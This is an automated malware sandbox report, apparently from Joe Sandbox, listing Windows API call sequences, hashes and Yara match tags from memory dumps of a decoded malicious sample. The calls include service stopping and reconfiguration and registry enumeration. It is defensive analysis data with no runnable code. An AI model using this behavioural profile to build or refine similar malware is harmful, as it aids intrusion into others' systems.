• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,1001B43F,00000001,00000001,?), ref: 1001B248
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,?,?,?,1001B43F,00000001,00000001,?), ref: 1001B2CE
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 1001B3C8
• __freea.LIBCMT ref: 1001B3D5
  • Part of subcall function 10015A9F: RtlAllocateHeap.NTDLL(00000000,1000A5B7,?), ref: 10015AD1
• __freea.LIBCMT ref: 1001B3DE
• __freea.LIBCMT ref: 1001B403
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: 713b21457b86c78c97a8fa2f39a5facc734242a0c8a2d842c960e8097c1d1dbc
• Instruction ID: 2ed5a0c60fab733cb76eb0d012d0445d28864b3239f3e6487cb8682899a93c8b
• Opcode Fuzzy Hash: 713b21457b86c78c97a8fa2f39a5facc734242a0c8a2d842c960e8097c1d1dbc
• Instruction Fuzzy Hash: AE51F372600A16ABEB15CFA4CC81EAF37E9EF44690F524229FD14DE180EB74EDD1C660
APIs
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
• Opcode ID: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
• Instruction ID: 51d3defa9bee42a6449c1cbae1767e96f335fc55d8793b788aa7c8c1dec457a3
• Opcode Fuzzy Hash: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
• Instruction Fuzzy Hash: DE510A72900205ABFB249F598C81FAF77A9EFC9324F25421FF814A6291DB3DDD01866D
APIs
• _strlen.LIBCMT ref: 02831607
• _strcat.LIBCMT ref: 0283161D
• lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,0283190E,?,?,00000000,?,00000000), ref: 02831643
• lstrcatW.KERNEL32(?,?,?,?,?,?,0283190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 0283165A
• lstrlenW.KERNEL32(?,?,?,?,?,0283190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 02831661
• lstrcatW.KERNEL32(00001008,?,?,?,?,?,0283190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 02831686
Memory Dump Source
• Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: lstrcatlstrlen$_strcat_strlen
• String ID:
• API String ID: 1922816806-0
• Opcode ID: 41796c742e82e111ec398759d02515e3b33f47fdc63f32b9b789b3f377c6ec55
• Instruction ID: 6f718b2247b3cd4897459c09dafef63e3d6c3427729a4217a5abc13e76cf6738
• Opcode Fuzzy Hash: 41796c742e82e111ec398759d02515e3b33f47fdc63f32b9b789b3f377c6ec55
• Instruction Fuzzy Hash: 57218D3E900204ABD705DB58EC85EEE77B9EF48720F14842AE508EB181DB74A5469BE5
APIs
• lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 02831038
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 0283104B
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 02831061
• lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 02831075
• GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 02831090
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 028310B8
Memory Dump Source
• Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3594823470-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 38225a41950aed0c0381db88527e9fc6f05970d4aa5b612adafab4b2deefc81f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 091a9f764e91baff139fd43a6989378f4e7c89e1899d65e055e0093560583dc4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38225a41950aed0c0381db88527e9fc6f05970d4aa5b612adafab4b2deefc81f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08219F3D9002189BCF21DA64DC5CEDB3769EF44714F104696E86DE31A1DB309A95CF91
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E0C
                                                                                                                                                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E20
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E2D
                                                                                                                                                                                                                                                                                                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419517), ref: 00419E62
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E74
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E77
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 493672254-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 68f1e835941cc6574ae3172da8245a4dbba7b98562f75027ccb4571b71c43179
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 40159264159f5a90cd52f9b689d0e8cb5e0ea154c732c405bcbf7063391161e0
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68f1e835941cc6574ae3172da8245a4dbba7b98562f75027ccb4571b71c43179
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09016D311083107AE3118B34EC1EFBF3B5CDB41B70F00023BF626922D1DA68CE8581A9
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00437E0D,004377C1), ref: 00437E24
                                                                                                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E32
                                                                                                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E4B
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00437E0D,004377C1), ref: 00437E9D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b42a492c3bf34377e6814907667dc2d2d4637d0875d9ccbe0f9eef23a1c86691
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 127a8aaeb23cc4eddae083ca6fcd73be4c6f1963697d6e79a1959115bdf772ac
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b42a492c3bf34377e6814907667dc2d2d4637d0875d9ccbe0f9eef23a1c86691
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6701B57211D3159EE63427757C87A272B99EB0A779F20127FF228851E2EF2D4C41914C
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,02833518,028323F1,02831F17), ref: 02833864
                                                                                                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02833872
                                                                                                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0283388B
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,02833518,028323F1,02831F17), ref: 028338DD
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 3d9dad07d9ee3adc9e3bffcbca55177b08bc664bcbbb23e51276d0060e209a44
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9d03266e25a959d28f3ccb45009d6f7b5901133ef97c04752e8439575ada45fb
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d9dad07d9ee3adc9e3bffcbca55177b08bc664bcbbb23e51276d0060e209a44
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2201243EE097156EA616397D7C84A962B95DB0573472003A9E014E80E0EF515820C7C0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446F2E
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                              • _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 1b4467ed9408e6c3233579f8e1b56ac98d0768551ab8ff32c5b7efb0424b8365
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1F0F93560870027F61273797D46A6F15669BC37B6B26013FF909A2292EE2D8C06411F
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,02836C6C), ref: 02835AFA
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835B2D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835B55
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,02836C6C), ref: 02835B62
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,02836C6C), ref: 02835B6E
                                                                                                                                                                                                                                                                                                                              • _abort.LIBCMT ref: 02835B74
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 8ec780b4f84e5a1ee1d158e99ee359f1bfde862824746fa51cd89eeb27eafacc
                                                                                                                                                                                                                                                                                                                              • Instruction ID: e1e4ceb8db7d8c9e4601bf7903fb15a6991304db0dd28783d5a3899655a4d0bf
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ec780b4f84e5a1ee1d158e99ee359f1bfde862824746fa51cd89eeb27eafacc
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55F0A4BE984500ABD61332387C48F9A266B8BDDB75BA50924F819E61C0FF3C850285E6
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,1000310F,1000E403,1000310F,?,?,1000FF84,?,1000310F,?), ref: 10016A80
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 10016AB3
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 10016ADB
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,1000310F,?,?,?,?,?,?,?,?,100147C0,?,00000000,?,1000310F), ref: 10016AE8
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,1000310F,?,?,?,?,?,?,?,?,100147C0,?,00000000,?,1000310F), ref: 10016AF4
                                                                                                                                                                                                                                                                                                                              • _abort.LIBCMT ref: 10016AFA
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: abb8dc7b00a9e6ff34b690eb976e7739615ebad0393437c6e772e82f3a0abea1
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 628ed4293515944fb4ff5177b0ed0b0109413660cb9ab4ef9b2c29076bfe53c7
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: abb8dc7b00a9e6ff34b690eb976e7739615ebad0393437c6e772e82f3a0abea1
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39F02839140612B6D212D3649C87F5F32A6EFC96B1BB98124FE18BE191EF31DCD28463
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C3F
                                                                                                                                                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C53
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C60
                                                                                                                                                                                                                                                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C6F
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C81
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C84
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 221034970-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D41
                                                                                                                                                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D55
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D62
                                                                                                                                                                                                                                                                                                                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D71
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D83
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D86
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 221034970-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DA6
                                                                                                                                                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DBA
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DC7
                                                                                                                                                                                                                                                                                                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DD6
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DE8
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DEB
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 221034970-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                                                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                                                                                                                                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Enum$InfoQueryValue
                                                                                                                                                                                                                                                                                                                              • String ID: [regsplt]$DG
                                                                                                                                                                                                                                                                                                                              • API String ID: 3554306468-1089238109
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe,00000104), ref: 00442724
• _free.LIBCMT ref: 004427EF
• _free.LIBCMT ref: 004427F9
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: _free$FileModuleName
